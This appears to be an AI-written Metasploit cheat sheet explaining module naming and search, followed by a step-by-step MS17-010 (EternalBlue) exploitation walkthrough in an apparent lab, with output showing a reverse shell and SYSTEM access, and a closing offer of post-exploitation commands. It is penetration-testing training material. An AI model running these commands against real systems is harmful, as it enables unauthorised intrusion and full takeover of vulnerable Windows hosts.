🧰 Modules

📁 Module Structure

Syntax:

<No.> <type>/<os>/<service>/<name>

Example:

794  exploit/windows/ftp/scriptftp_list

Module Components:

Component	Description
Index No.	Number shown in search results for quick selection (use <no.>)
Type	One of: auxiliary, encoder, exploit, nop, payload, plugin, post
OS	Target operating system (e.g., Windows, Linux)
Service	Service involved (e.g., SMB, FTP)
Name	Explains the module's purpose

Only auxiliary, exploit, and post can be directly run with use <no.>.

---

🔍 Searching for Modules

Command:

msf6 > help search

Example:

msf6 > search eternalromance

Refined Example:

msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft

---

🎯 Selecting a Module (MS17-010 Example)

1. Scan Target

nmap -sV 10.10.10.40

1. Search Module

msf6 > search ms17_010

1. Use Exploit Module

msf6 > use 0

1. Show Options

msf6 exploit(windows/smb/ms17_010_psexec) > options

1. Set RHOST

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40

1. Set LHOST

msf6 exploit(windows/smb/ms17_010_psexec) > setg LHOST 10.10.14.15

1. Run the Exploit

msf6 exploit(windows/smb/ms17_010_psexec) > run

---

📋 Output from Successful Exploitation

[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.40:49158)
meterpreter> shell
C:\Windows\system32> whoami
nt authority\system

---

💡 Tips & Best Practices

• Use info to get detailed module description:

msf6 exploit(...) > info

• Use setg to globally persist variables like RHOSTS or LHOST:

setg RHOSTS <ip>
setg LHOST <your_ip>

• Metasploit payloads like windows/meterpreter/reverse_tcp allow interactive control.

---

Let me know if you'd like this in a downloadable format or expanded with post-exploitation commands!